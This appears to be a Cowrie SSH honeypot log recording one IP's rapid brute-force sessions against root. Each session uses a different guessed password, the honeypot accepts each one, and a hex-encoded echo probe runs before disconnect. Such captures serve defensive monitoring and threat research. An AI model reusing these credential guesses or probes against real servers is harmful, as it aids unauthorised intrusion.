{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.096478Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
{"eventid":"cowrie.login.success","username":"root","password":"atienza1","message":"login attempt [root/atienza1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.181963Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:51.241966Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.242678Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.267258Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.268294Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47562,"dst_ip":"1.2.3.4","dst_port":22,"session":"997a660a54da","protocol":"ssh","message":"New connection: 212.227.125.160:47562 (1.2.3.4:22) [session: 997a660a54da]","sensor":"my-vps","timestamp":"2025-08-28T11:47:02.518588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:02.522602Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:02.544436Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.login.success","username":"root","password":"arnaud1","message":"login attempt [root/arnaud1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:02.646248Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:03.151717Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.152443Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.177016Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.178260Z","src_ip":"212.227.125.160","session":"997a660a54da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34194,"dst_ip":"1.2.3.4","dst_port":22,"session":"be168c3a7c9c","protocol":"ssh","message":"New connection: 212.227.125.160:34194 (1.2.3.4:22) [session: be168c3a7c9c]","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.198850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.199514Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.222511Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.login.success","username":"root","password":"armande","message":"login attempt [root/armande] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.302372Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:03.371829Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.372561Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.396912Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.398128Z","src_ip":"212.227.125.160","session":"be168c3a7c9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34200,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f31963f15b7","protocol":"ssh","message":"New connection: 212.227.125.160:34200 (1.2.3.4:22) [session: 3f31963f15b7]","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.418892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.420079Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.442497Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.login.success","username":"root","password":"arbres","message":"login attempt [root/arbres] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.518739Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:03.582783Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.583323Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.607590Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.608708Z","src_ip":"212.227.125.160","session":"3f31963f15b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34202,"dst_ip":"1.2.3.4","dst_port":22,"session":"da115d9dcbc0","protocol":"ssh","message":"New connection: 212.227.125.160:34202 (1.2.3.4:22) [session: da115d9dcbc0]","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.629600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.630307Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.653205Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.login.success","username":"root","password":"angeles1","message":"login attempt [root/angeles1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.733505Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:03.794348Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.795133Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.818867Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.819905Z","src_ip":"212.227.125.160","session":"da115d9dcbc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34210,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3f7161f9ffa","protocol":"ssh","message":"New connection: 212.227.125.160:34210 (1.2.3.4:22) [session: a3f7161f9ffa]","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.841206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.842046Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.876420Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.login.success","username":"root","password":"ameline","message":"login attempt [root/ameline] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:03.968548Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:04.029525Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:04.030215Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:04.056111Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:04.057163Z","src_ip":"212.227.125.160","session":"a3f7161f9ffa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34220,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a1d10a5f505","protocol":"ssh","message":"New connection: 212.227.125.160:34220 (1.2.3.4:22) [session: 7a1d10a5f505]","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.165363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.182390Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.204078Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.login.success","username":"root","password":"aloulou","message":"login attempt [root/aloulou] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.280656Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:06.341753Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.342420Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.366618Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.367876Z","src_ip":"212.227.125.160","session":"7a1d10a5f505"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34224,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b788ff07eb","protocol":"ssh","message":"New connection: 212.227.125.160:34224 (1.2.3.4:22) [session: e2b788ff07eb]","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.388392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.389586Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.426730Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.login.success","username":"root","password":"alexandrine","message":"login attempt [root/alexandrine] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:06.503626Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:07.039791Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:07.040516Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:07.064359Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:07.065440Z","src_ip":"212.227.125.160","session":"e2b788ff07eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34234,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bc59d9ea0f3","protocol":"ssh","message":"New connection: 212.227.125.160:34234 (1.2.3.4:22) [session: 0bc59d9ea0f3]","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.197280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.202354Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
